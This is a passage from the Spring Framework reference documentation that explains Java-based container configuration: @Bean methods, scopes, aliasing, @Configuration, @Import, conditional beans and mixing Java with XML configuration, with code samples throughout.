the\ncontainer.\n====\n\n\n[[beans-java-instantiating-container-web]]\n==== Support for web applications with AnnotationConfigWebApplicationContext\n\nA `WebApplicationContext` variant of `AnnotationConfigApplicationContext` is available\nwith `AnnotationConfigWebApplicationContext`. This implementation may be used when\nconfiguring the Spring `ContextLoaderListener` servlet listener, Spring MVC\n`DispatcherServlet`, etc. What follows is a `web.xml` snippet that configures a typical\nSpring MVC web application. Note the use of the `contextClass` context-param and\ninit-param:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<web-app>\n\t\t<!-- Configure ContextLoaderListener to use AnnotationConfigWebApplicationContext\n\t\t\tinstead of the default XmlWebApplicationContext -->\n\t\t<context-param>\n\t\t\t<param-name>contextClass<\/param-name>\n\t\t\t<param-value>\n\t\t\t\torg.springframework.web.context.support.AnnotationConfigWebApplicationContext\n\t\t\t<\/param-value>\n\t\t<\/context-param>\n\n\t\t<!-- Configuration locations must consist of one or more comma- or space-delimited\n\t\t\tfully-qualified @Configuration classes. 
Fully-qualified packages may also be\n\t\t\tspecified for component-scanning -->\n\t\t<context-param>\n\t\t\t<param-name>contextConfigLocation<\/param-name>\n\t\t\t<param-value>com.acme.AppConfig<\/param-value>\n\t\t<\/context-param>\n\n\t\t<!-- Bootstrap the root application context as usual using ContextLoaderListener -->\n\t\t<listener>\n\t\t\t<listener-class>org.springframework.web.context.ContextLoaderListener<\/listener-class>\n\t\t<\/listener>\n\n\t\t<!-- Declare a Spring MVC DispatcherServlet as usual -->\n\t\t<servlet>\n\t\t\t<servlet-name>dispatcher<\/servlet-name>\n\t\t\t<servlet-class>org.springframework.web.servlet.DispatcherServlet<\/servlet-class>\n\t\t\t<!-- Configure DispatcherServlet to use AnnotationConfigWebApplicationContext\n\t\t\t\tinstead of the default XmlWebApplicationContext -->\n\t\t\t<init-param>\n\t\t\t\t<param-name>contextClass<\/param-name>\n\t\t\t\t<param-value>\n\t\t\t\t\torg.springframework.web.context.support.AnnotationConfigWebApplicationContext\n\t\t\t\t<\/param-value>\n\t\t\t<\/init-param>\n\t\t\t<!-- Again, config locations must consist of one or more comma- or space-delimited\n\t\t\t\tand fully-qualified @Configuration classes -->\n\t\t\t<init-param>\n\t\t\t\t<param-name>contextConfigLocation<\/param-name>\n\t\t\t\t<param-value>com.acme.web.MvcConfig<\/param-value>\n\t\t\t<\/init-param>\n\t\t<\/servlet>\n\n\t\t<!-- map all requests for \/app\/* to the dispatcher servlet -->\n\t\t<servlet-mapping>\n\t\t\t<servlet-name>dispatcher<\/servlet-name>\n\t\t\t<url-pattern>\/app\/*<\/url-pattern>\n\t\t<\/servlet-mapping>\n\t<\/web-app>\n----\n\n\n\n[[beans-java-bean-annotation]]\n=== Using the @Bean annotation\n\n`@Bean` is a method-level annotation and a direct analog of the XML `<bean\/>` element.\nThe annotation supports some of the attributes offered by `<bean\/>`, such as:\n<<beans-factory-lifecycle-initializingbean,init-method>>,\n<<beans-factory-lifecycle-disposablebean,destroy-method>>,\n<<beans-factory-autowire,autowiring>> and `name`.\n\nYou can use the `@Bean` annotation in a `@Configuration`-annotated or in a\n`@Component`-annotated class.\n\n\n[[beans-java-declaring-a-bean]]\n==== Declaring a bean\n\nTo declare a bean, simply annotate a method with the `@Bean` annotation. You use this\nmethod to register a bean definition within an `ApplicationContext` of the type\nspecified as the method's return value. By default, the bean name will be the same as\nthe method name. The following is a simple example of a `@Bean` method declaration:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\treturn new TransferServiceImpl();\n\t\t}\n\n\t}\n----\n\nThe preceding configuration is exactly equivalent to the following Spring XML:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<bean id=\"transferService\" class=\"com.acme.TransferServiceImpl\"\/>\n\t<\/beans>\n----\n\nBoth declarations make a bean named `transferService` available in the\n`ApplicationContext`, bound to an object instance of type `TransferServiceImpl`:\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\ntransferService -> com.acme.TransferServiceImpl\n----\n\n\n[[beans-java-dependencies]]\n==== Bean dependencies\n\nA `@Bean` annotated method can have an arbitrary number of parameters describing the\ndependencies required to build that bean. 
For instance if our `TransferService`\nrequires an `AccountRepository` we can materialize that dependency via a method\nparameter:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\tpublic TransferService transferService(AccountRepository accountRepository) {\n\t\t\treturn new TransferServiceImpl(accountRepository);\n\t\t}\n\n\t}\n----\n\nThe resolution mechanism is pretty much identical to constructor-based dependency\ninjection, see <<beans-constructor-injection,the relevant section>> for more details.\n\n\n[[beans-java-lifecycle-callbacks]]\n==== Receiving lifecycle callbacks\n\nAny classes defined with the `@Bean` annotation support the regular lifecycle callbacks\nand can use the `@PostConstruct` and `@PreDestroy` annotations from JSR-250, see\n<<beans-postconstruct-and-predestroy-annotations,JSR-250 annotations>> for further\ndetails.\n\nThe regular Spring <<beans-factory-nature,lifecycle>> callbacks are fully supported as\nwell. If a bean implements `InitializingBean`, `DisposableBean`, or `Lifecycle`, their\nrespective methods are called by the container.\n\nThe standard set of `*Aware` interfaces such as <<beans-beanfactory,BeanFactoryAware>>,\n<<beans-factory-aware,BeanNameAware>>,\n<<context-functionality-messagesource,MessageSourceAware>>,\n<<beans-factory-aware,ApplicationContextAware>>, and so on are also fully supported.\n\nThe `@Bean` annotation supports specifying arbitrary initialization and destruction\ncallback methods, much like Spring XML's `init-method` and `destroy-method` attributes\non the `bean` element:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class Foo {\n\t\tpublic void init() {\n\t\t\t\/\/ initialization logic\n\t\t}\n\t}\n\n\tpublic class Bar {\n\t\tpublic void cleanup() {\n\t\t\t\/\/ destruction logic\n\t\t}\n\t}\n\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean(initMethod = \"init\")\n\t\tpublic Foo foo() {\n\t\t\treturn new Foo();\n\t\t}\n\n\t\t@Bean(destroyMethod = \"cleanup\")\n\t\tpublic Bar bar() {\n\t\t\treturn new Bar();\n\t\t}\n\n\t}\n----\n\n[NOTE]\n====\nBy default, beans defined using Java config that have a public `close` or `shutdown`\nmethod are automatically enlisted with a destruction callback. If you have a public\n`close` or `shutdown` method and you do not wish for it to be called when the container\nshuts down, simply add `@Bean(destroyMethod=\"\")` to your bean definition to disable the\ndefault `(inferred)` mode.\n\nYou may want to do that by default for a resource that you acquire via JNDI as its\nlifecycle is managed outside the application. 
In particular, make sure to always do it\nfor a `DataSource` as it is known to be problematic on Java EE application servers.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Bean(destroyMethod=\"\")\n\tpublic DataSource dataSource() throws NamingException {\n\t\treturn (DataSource) jndiTemplate.lookup(\"MyDS\");\n\t}\n----\n\nAlso, with `@Bean` methods, you will typically choose to use programmatic JNDI lookups:\neither using Spring's `JndiTemplate`\/`JndiLocatorDelegate` helpers or straight JNDI\n`InitialContext` usage, but not the `JndiObjectFactoryBean` variant, which would force\nyou to declare the return type as the `FactoryBean` type instead of the actual target\ntype, making it harder to use in cross-reference calls from other `@Bean` methods that\nintend to refer to the resource provided here.\n====\n\nOf course, in the case of `Foo` above, it would be equally valid to call the `init()`\nmethod directly during construction:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\tpublic Foo foo() {\n\t\t\tFoo foo = new Foo();\n\t\t\tfoo.init();\n\t\t\treturn foo;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[TIP]\n====\nWhen you work directly in Java, you can do anything you like with your objects and do\nnot always need to rely on the container lifecycle!\n====\n\n\n[[beans-java-specifying-bean-scope]]\n==== Specifying bean scope\n\n[[beans-java-available-scopes]]\n===== Using the @Scope annotation\n\nYou can specify that your beans defined with the `@Bean` annotation should have a\nspecific scope. You can use any of the standard scopes specified in the\n<<beans-factory-scopes,Bean Scopes>> section.\n\nThe default scope is `singleton`, but you can override this with the `@Scope` annotation:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class MyConfiguration {\n\n\t\t@Bean\n\t\t**@Scope(\"prototype\")**\n\t\tpublic Encryptor encryptor() {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\n[[beans-java-scoped-proxy]]\n===== @Scope and scoped-proxy\n\nSpring offers a convenient way of working with scoped dependencies through\n<<beans-factory-scopes-other-injection,scoped proxies>>. The easiest way to create such\na proxy when using the XML configuration is the `<aop:scoped-proxy\/>` element.\nConfiguring your beans in Java with the `@Scope` annotation offers equivalent support\nwith the `proxyMode` attribute. The default is no proxy (`ScopedProxyMode.NO`), but you\ncan specify `ScopedProxyMode.TARGET_CLASS` or `ScopedProxyMode.INTERFACES`.\n\nIf you port the scoped proxy example from the XML reference documentation (see the\npreceding link) to Java using `@Bean`, it would look like the following:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ an HTTP Session-scoped bean exposed as a proxy\n\t@Bean\n\t**@SessionScope**\n\tpublic UserPreferences userPreferences() {\n\t\treturn new UserPreferences();\n\t}\n\n\t@Bean\n\tpublic UserService userService() {\n\t\tUserService service = new SimpleUserService();\n\t\t\/\/ a reference to the proxied userPreferences bean\n\t\tservice.setUserPreferences(userPreferences());\n\t\treturn service;\n\t}\n----\n\n\n[[beans-java-customizing-bean-naming]]\n==== Customizing bean naming\n\nBy default, configuration classes use a `@Bean` method's name as the name of the\nresulting bean. 
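For example, the bean declared by the `transferService()` method shown at the start of\nthis section can be retrieved from the container under that defaulted name. The\nfollowing is a minimal usage sketch (assuming the `AppConfig` class from the earlier\nexample):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tApplicationContext ctx = new AnnotationConfigApplicationContext(AppConfig.class);\n\t\/\/ the bean name defaults to the @Bean method name: \"transferService\"\n\tTransferService transferService = ctx.getBean(\"transferService\", TransferService.class);\n----\n\n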
This functionality can be overridden, however, with the `name` attribute:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean(name = \"myFoo\")\n\t\tpublic Foo foo() {\n\t\t\treturn new Foo();\n\t\t}\n\n\t}\n----\n\n\n[[beans-java-bean-aliasing]]\n==== Bean aliasing\n\nAs discussed in <<beans-beanname>>, it is sometimes desirable to give a single bean\nmultiple names, otherwise known as __bean aliasing__. The `name` attribute of the `@Bean`\nannotation accepts a String array for this purpose.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean(name = { \"dataSource\", \"subsystemA-dataSource\", \"subsystemB-dataSource\" })\n\t\tpublic DataSource dataSource() {\n\t\t\t\/\/ instantiate, configure and return DataSource bean...\n\t\t}\n\n\t}\n----\n\n\n[[beans-java-bean-description]]\n==== Bean description\n\nSometimes it is helpful to provide a more detailed textual description of a bean. This can\nbe particularly useful when beans are exposed (perhaps via JMX) for monitoring purposes.\n\nTo add a description to a `@Bean`, the\n{api-spring-framework}\/context\/annotation\/Description.html[`@Description`]\nannotation can be used:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\t**@Description(\"Provides a basic example of a bean\")**\n\t\tpublic Foo foo() {\n\t\t\treturn new Foo();\n\t\t}\n\n\t}\n----\n\n\n[[beans-java-configuration-annotation]]\n=== Using the @Configuration annotation\n\n`@Configuration` is a class-level annotation indicating that an object is a source of\nbean definitions. `@Configuration` classes declare beans via public `@Bean` annotated\nmethods. Calls to `@Bean` methods on `@Configuration` classes can also be used to define\ninter-bean dependencies. See <<beans-java-basic-concepts>> for a general introduction.\n\n\n[[beans-java-injecting-dependencies]]\n==== Injecting inter-bean dependencies\n\nWhen ``@Bean``s have dependencies on one another, expressing that dependency is as simple\nas having one bean method call another:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\tpublic Foo foo() {\n\t\t\treturn new Foo(bar());\n\t\t}\n\n\t\t@Bean\n\t\tpublic Bar bar() {\n\t\t\treturn new Bar();\n\t\t}\n\n\t}\n----\n\nIn the example above, the `foo` bean receives a reference to `bar` via constructor\ninjection.\n\n[NOTE]\n====\nThis method of declaring inter-bean dependencies only works when the `@Bean` method is\ndeclared within a `@Configuration` class. You cannot declare inter-bean dependencies\nusing plain `@Component` classes.\n====\n\n\n[[beans-java-method-injection]]\n==== Lookup method injection\n\nAs noted earlier, <<beans-factory-method-injection,lookup method injection>> is an\nadvanced feature that you should use rarely. It is useful in cases where a\nsingleton-scoped bean has a dependency on a prototype-scoped bean. 
Using Java for this\ntype of configuration provides a natural means for implementing this pattern.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic abstract class CommandManager {\n\t\tpublic Object process(Object commandState) {\n\t\t\t\/\/ grab a new instance of the appropriate Command interface\n\t\t\tCommand command = createCommand();\n\t\t\t\/\/ set the state on the (hopefully brand new) Command instance\n\t\t\tcommand.setState(commandState);\n\t\t\treturn command.execute();\n\t\t}\n\n\t\t\/\/ okay... but where is the implementation of this method?\n\t\tprotected abstract Command createCommand();\n\t}\n----\n\nUsing Java configuration support, you can create a subclass of `CommandManager` where\nthe abstract `createCommand()` method is overridden in such a way that it looks up a new\n(prototype) command object:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Bean\n\t@Scope(\"prototype\")\n\tpublic AsyncCommand asyncCommand() {\n\t\tAsyncCommand command = new AsyncCommand();\n\t\t\/\/ inject dependencies here as required\n\t\treturn command;\n\t}\n\n\t@Bean\n\tpublic CommandManager commandManager() {\n\t\t\/\/ return new anonymous implementation of CommandManager with createCommand()\n\t\t\/\/ overridden to return a new prototype Command object\n\t\treturn new CommandManager() {\n\t\t\tprotected Command createCommand() {\n\t\t\t\treturn asyncCommand();\n\t\t\t}\n\t\t};\n\t}\n----\n\n\n[[beans-java-further-information-java-config]]\n==== Further information about how Java-based configuration works internally\n\nThe following example shows a `@Bean` annotated method being called twice:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\tpublic ClientService clientService1() {\n\t\t\tClientServiceImpl clientService = new ClientServiceImpl();\n\t\t\tclientService.setClientDao(clientDao());\n\t\t\treturn clientService;\n\t\t}\n\n\t\t@Bean\n\t\tpublic ClientService clientService2() {\n\t\t\tClientServiceImpl clientService = new ClientServiceImpl();\n\t\t\tclientService.setClientDao(clientDao());\n\t\t\treturn clientService;\n\t\t}\n\n\t\t@Bean\n\t\tpublic ClientDao clientDao() {\n\t\t\treturn new ClientDaoImpl();\n\t\t}\n\n\t}\n----\n\n`clientDao()` has been called once in `clientService1()` and once in `clientService2()`.\nSince this method creates a new instance of `ClientDaoImpl` and returns it, you would\nnormally expect to have two instances (one for each service). That would definitely be\nproblematic: in Spring, instantiated beans have a `singleton` scope by default. This is\nwhere the magic comes in: all `@Configuration` classes are subclassed at startup-time\nwith `CGLIB`. In the subclass, the child method checks the container first for any\ncached (scoped) beans before it calls the parent method and creates a new instance. Note\nthat as of Spring 3.2, it is no longer necessary to add CGLIB to your classpath because\nCGLIB classes have been repackaged under `org.springframework.cglib` and included directly\nwithin the spring-core JAR.\n\n[NOTE]\n====\nThe behavior could be different according to the scope of your bean. We are talking\nabout singletons here.\n====\n\n[TIP]\n====\nThere are a few restrictions due to the fact that CGLIB dynamically adds features at\nstartup-time, in particular that configuration classes must not be final. 
However, as\nof Spring 4.3, any constructors are allowed on configuration classes, including the use\nof `@Autowired` or a single non-default constructor declaration for default injection.\n\nIf you prefer to avoid any CGLIB-imposed limitations, consider declaring your `@Bean`\nmethods on non-`@Configuration` classes, e.g. on plain `@Component` classes instead.\nCross-method calls between `@Bean` methods won't get intercepted then, so you'll have\nto exclusively rely on dependency injection at the constructor or method level there.\n====\n\n\n\n[[beans-java-composing-configuration-classes]]\n=== Composing Java-based configurations\n\n\n[[beans-java-using-import]]\n==== Using the @Import annotation\n\nMuch as the `<import\/>` element is used within Spring XML files to aid in modularizing\nconfigurations, the `@Import` annotation allows for loading `@Bean` definitions from\nanother configuration class:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class ConfigA {\n\n\t\t@Bean\n\t\tpublic A a() {\n\t\t\treturn new A();\n\t\t}\n\n\t}\n\n\t@Configuration\n\t@Import(ConfigA.class)\n\tpublic class ConfigB {\n\n\t\t@Bean\n\t\tpublic B b() {\n\t\t\treturn new B();\n\t\t}\n\n\t}\n----\n\nNow, rather than needing to specify both `ConfigA.class` and `ConfigB.class` when\ninstantiating the context, only `ConfigB` needs to be supplied explicitly:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new AnnotationConfigApplicationContext(ConfigB.class);\n\n\t\t\/\/ now both beans A and B will be available...\n\t\tA a = ctx.getBean(A.class);\n\t\tB b = ctx.getBean(B.class);\n\t}\n----\n\nThis approach simplifies container instantiation, as only one class needs to be dealt\nwith, rather than requiring the developer to remember a potentially large number of\n`@Configuration` classes during construction.\n\n[TIP]\n====\nAs of Spring Framework 4.2, `@Import` also supports references to regular component\nclasses, analogous to the `AnnotationConfigApplicationContext.register` method.\nThis is particularly useful if you'd like to avoid component scanning, using a few\nconfiguration classes as entry points for explicitly defining all your components.\n====\n\n[[beans-java-injecting-imported-beans]]\n===== Injecting dependencies on imported @Bean definitions\n\nThe example above works, but is simplistic. In most practical scenarios, beans will have\ndependencies on one another across configuration classes. When using XML, this is not an\nissue, per se, because there is no compiler involved, and one can simply declare\n`ref=\"someBean\"` and trust that Spring will work it out during container initialization.\nOf course, when using `@Configuration` classes, the Java compiler places constraints on\nthe configuration model, in that references to other beans must be valid Java syntax.\n\nFortunately, solving this problem is simple. As <<beans-java-dependencies,we already discussed>>,\na `@Bean` method can have an arbitrary number of parameters describing the bean\ndependencies. 
Let's consider a more real-world scenario with several `@Configuration`\nclasses, each depending on beans declared in the others:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class ServiceConfig {\n\n\t\t@Bean\n\t\tpublic TransferService transferService(AccountRepository accountRepository) {\n\t\t\treturn new TransferServiceImpl(accountRepository);\n\t\t}\n\n\t}\n\n\t@Configuration\n\tpublic class RepositoryConfig {\n\n\t\t@Bean\n\t\tpublic AccountRepository accountRepository(DataSource dataSource) {\n\t\t\treturn new JdbcAccountRepository(dataSource);\n\t\t}\n\n\t}\n\n\t@Configuration\n\t@Import({ServiceConfig.class, RepositoryConfig.class})\n\tpublic class SystemTestConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\t\/\/ return new DataSource\n\t\t}\n\n\t}\n\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new AnnotationConfigApplicationContext(SystemTestConfig.class);\n\t\t\/\/ everything wires up across configuration classes...\n\t\tTransferService transferService = ctx.getBean(TransferService.class);\n\t\ttransferService.transfer(100.00, \"A123\", \"C456\");\n\t}\n----\n\nThere is another way to achieve the same result. Remember that `@Configuration` classes are\nultimately just another bean in the container. This means that they can take advantage of\n`@Autowired` and `@Value` injection, and so on, just like any other bean.\n\n[WARNING]\n====\nMake sure that the dependencies you inject that way are of the simplest kind only. `@Configuration`\nclasses are processed quite early during the initialization of the context and forcing a dependency\nto be injected this way may lead to unexpected early initialization. Whenever possible, resort to\nparameter-based injection as in the example above.\n\nAlso, be particularly careful with `BeanPostProcessor` and `BeanFactoryPostProcessor` definitions\nvia `@Bean`. Those should usually be declared as `static @Bean` methods, not triggering the\ninstantiation of their containing configuration class. Otherwise, `@Autowired` and `@Value` won't\nwork on the configuration class itself since it is being created as a bean instance too early.\n====\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class ServiceConfig {\n\n\t\t@Autowired\n\t\tprivate AccountRepository accountRepository;\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\treturn new TransferServiceImpl(accountRepository);\n\t\t}\n\n\t}\n\n\t@Configuration\n\tpublic class RepositoryConfig {\n\n\t\tprivate final DataSource dataSource;\n\n\t\t@Autowired\n\t\tpublic RepositoryConfig(DataSource dataSource) {\n\t\t\tthis.dataSource = dataSource;\n\t\t}\n\n\t\t@Bean\n\t\tpublic AccountRepository accountRepository() {\n\t\t\treturn new JdbcAccountRepository(dataSource);\n\t\t}\n\n\t}\n\n\t@Configuration\n\t@Import({ServiceConfig.class, RepositoryConfig.class})\n\tpublic class SystemTestConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\t\/\/ return new DataSource\n\t\t}\n\n\t}\n\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new AnnotationConfigApplicationContext(SystemTestConfig.class);\n\t\t\/\/ everything wires up across configuration classes...\n\t\tTransferService transferService = ctx.getBean(TransferService.class);\n\t\ttransferService.transfer(100.00, \"A123\", \"C456\");\n\t}\n----\n\n[TIP]\n====\nConstructor injection in `@Configuration` classes is only supported as of Spring\nFramework 4.3. 
Note also that there is no need to specify `@Autowired` if the target\nbean defines only one constructor; in the example above, `@Autowired` is not necessary\non the `RepositoryConfig` constructor.\n====\n\n.[[beans-java-injecting-imported-beans-fq]]Fully-qualifying imported beans for ease of navigation\n--\nIn the scenario above, using `@Autowired` works well and provides the desired\nmodularity, but determining exactly where the autowired bean definitions are declared is\nstill somewhat ambiguous. For example, as a developer looking at `ServiceConfig`, how do\nyou know exactly where the `@Autowired AccountRepository` bean is declared? It's not\nexplicit in the code, and this may be just fine. Remember that the\nhttps:\/\/spring.io\/tools\/sts[Spring Tool Suite] provides tooling that\ncan render graphs showing how everything is wired up - that may be all you need. Also,\nyour Java IDE can easily find all declarations and uses of the `AccountRepository` type,\nand will quickly show you the location of `@Bean` methods that return that type.\n\nIn cases where this ambiguity is not acceptable and you wish to have direct navigation\nfrom within your IDE from one `@Configuration` class to another, consider autowiring the\nconfiguration classes themselves:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class ServiceConfig {\n\n\t\t@Autowired\n\t\tprivate RepositoryConfig repositoryConfig;\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\t\/\/ navigate 'through' the config class to the @Bean method!\n\t\t\treturn new TransferServiceImpl(repositoryConfig.accountRepository());\n\t\t}\n\n\t}\n----\n\nIn the situation above, it is completely explicit where `AccountRepository` is defined.\nHowever, `ServiceConfig` is now tightly coupled to `RepositoryConfig`; that's the\ntradeoff. This tight coupling can be somewhat mitigated by using interface-based or\nabstract class-based `@Configuration` classes. Consider the following:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class ServiceConfig {\n\n\t\t@Autowired\n\t\tprivate RepositoryConfig repositoryConfig;\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\treturn new TransferServiceImpl(repositoryConfig.accountRepository());\n\t\t}\n\t}\n\n\t@Configuration\n\tpublic interface RepositoryConfig {\n\n\t\t@Bean\n\t\tAccountRepository accountRepository();\n\n\t}\n\n\t@Configuration\n\tpublic class DefaultRepositoryConfig implements RepositoryConfig {\n\n\t\t@Bean\n\t\tpublic AccountRepository accountRepository() {\n\t\t\treturn new JdbcAccountRepository(...);\n\t\t}\n\n\t}\n\n\t@Configuration\n\t@Import({ServiceConfig.class, DefaultRepositoryConfig.class}) \/\/ import the concrete config!\n\tpublic class SystemTestConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\t\/\/ return DataSource\n\t\t}\n\n\t}\n\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new AnnotationConfigApplicationContext(SystemTestConfig.class);\n\t\tTransferService transferService = ctx.getBean(TransferService.class);\n\t\ttransferService.transfer(100.00, \"A123\", \"C456\");\n\t}\n----\n\nNow `ServiceConfig` is loosely coupled with respect to the concrete\n`DefaultRepositoryConfig`, and built-in IDE tooling is still useful: it will be easy for\nthe developer to get a type hierarchy of `RepositoryConfig` implementations. 
In this\nway, navigating `@Configuration` classes and their dependencies becomes no different\nthan the usual process of navigating interface-based code.\n--\n\n\n[[beans-java-conditional]]\n==== Conditionally include @Configuration classes or @Bean methods\n\nIt is often useful to conditionally enable or disable a complete `@Configuration` class,\nor even individual `@Bean` methods, based on some arbitrary system state. One common\nexample of this is to use the `@Profile` annotation to activate beans only when a specific\nprofile has been enabled in the Spring `Environment` (see <<beans-definition-profiles>>\nfor details).\n\nThe `@Profile` annotation is actually implemented using a much more flexible annotation\ncalled {api-spring-framework}\/context\/annotation\/Conditional.html[`@Conditional`].\nThe `@Conditional` annotation indicates specific\n`org.springframework.context.annotation.Condition` implementations that should be\nconsulted before a `@Bean` is registered.\n\nImplementations of the `Condition` interface simply provide a `matches(...)`\nmethod that returns `true` or `false`. For example, here is the actual\n`Condition` implementation used for `@Profile`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Override\n\tpublic boolean matches(ConditionContext context, AnnotatedTypeMetadata metadata) {\n\t\tif (context.getEnvironment() != null) {\n\t\t\t\/\/ Read the @Profile annotation attributes\n\t\t\tMultiValueMap<String, Object> attrs = metadata.getAllAnnotationAttributes(Profile.class.getName());\n\t\t\tif (attrs != null) {\n\t\t\t\tfor (Object value : attrs.get(\"value\")) {\n\t\t\t\t\tif (context.getEnvironment().acceptsProfiles(((String[]) value))) {\n\t\t\t\t\t\treturn true;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\treturn false;\n\t\t\t}\n\t\t}\n\t\treturn true;\n\t}\n----\n\nSee the {api-spring-framework}\/context\/annotation\/Conditional.html[\n`@Conditional` javadocs] for more detail.\n\n[[beans-java-combining]]\n==== Combining Java and XML configuration\n\nSpring's `@Configuration` class support does not aim to be a 100% complete replacement\nfor Spring XML. Some facilities such as Spring XML namespaces remain an ideal way to\nconfigure the container. In cases where XML is convenient or necessary, you have a\nchoice: either instantiate the container in an \"XML-centric\" way using, for example,\n`ClassPathXmlApplicationContext`, or in a \"Java-centric\" fashion using\n`AnnotationConfigApplicationContext` and the `@ImportResource` annotation to import XML\nas needed.\n\n[[beans-java-combining-xml-centric]]\n===== XML-centric use of @Configuration classes\n\nIt may be preferable to bootstrap the Spring container from XML and include\n`@Configuration` classes in an ad-hoc fashion. For example, in a large existing codebase\nthat uses Spring XML, it will be easier to create `@Configuration` classes on an\nas-needed basis and include them from the existing XML files. Below you'll find the\noptions for using `@Configuration` classes in this kind of \"XML-centric\" situation.\n\n.[[beans-java-combining-xml-centric-declare-as-bean]]Declaring @Configuration classes as plain Spring `<bean\/>` elements\n--\nRemember that `@Configuration` classes are ultimately just bean definitions in the\ncontainer. In this example, we create a `@Configuration` class named `AppConfig` and\ninclude it within `system-test-config.xml` as a `<bean\/>` definition. 
Because\n`<context:annotation-config\/>` is switched on, the container will recognize the\n`@Configuration` annotation and process the `@Bean` methods declared in `AppConfig`\nproperly.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Autowired\n\t\tprivate DataSource dataSource;\n\n\t\t@Bean\n\t\tpublic AccountRepository accountRepository() {\n\t\t\treturn new JdbcAccountRepository(dataSource);\n\t\t}\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\treturn new TransferService(accountRepository());\n\t\t}\n\n\t}\n----\n\n*system-test-config.xml*:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<!-- enable processing of annotations such as @Autowired and @Configuration -->\n\t\t<context:annotation-config\/>\n\t\t<context:property-placeholder location=\"classpath:\/com\/acme\/jdbc.properties\"\/>\n\n\t\t<bean class=\"com.acme.AppConfig\"\/>\n\n\t\t<bean class=\"org.springframework.jdbc.datasource.DriverManagerDataSource\">\n\t\t\t<property name=\"url\" value=\"${jdbc.url}\"\/>\n\t\t\t<property name=\"username\" value=\"${jdbc.username}\"\/>\n\t\t\t<property name=\"password\" value=\"${jdbc.password}\"\/>\n\t\t<\/bean>\n\t<\/beans>\n----\n\n*jdbc.properties*:\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\njdbc.url=jdbc:hsqldb:hsql:\/\/localhost\/xdb\njdbc.username=sa\njdbc.password=\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new ClassPathXmlApplicationContext(\"classpath:\/com\/acme\/system-test-config.xml\");\n\t\tTransferService transferService = ctx.getBean(TransferService.class);\n\t\t\/\/ ...\n\t}\n----\n\n[NOTE]\n====\nIn `system-test-config.xml` above, the `AppConfig` `<bean\/>` does not declare an `id`\nelement. While it would be acceptable to do so, it is unnecessary given that no other\nbean will ever refer to it, and it is unlikely that it will be explicitly fetched from\nthe container by name. Likewise with the `DataSource` bean - it is only ever autowired\nby type, so an explicit bean `id` is not strictly required.\n====\n--\n\n.[[beans-java-combining-xml-centric-component-scan]] Using <context:component-scan\/> to pick up `@Configuration` classes\n--\nBecause `@Configuration` is meta-annotated with `@Component`, 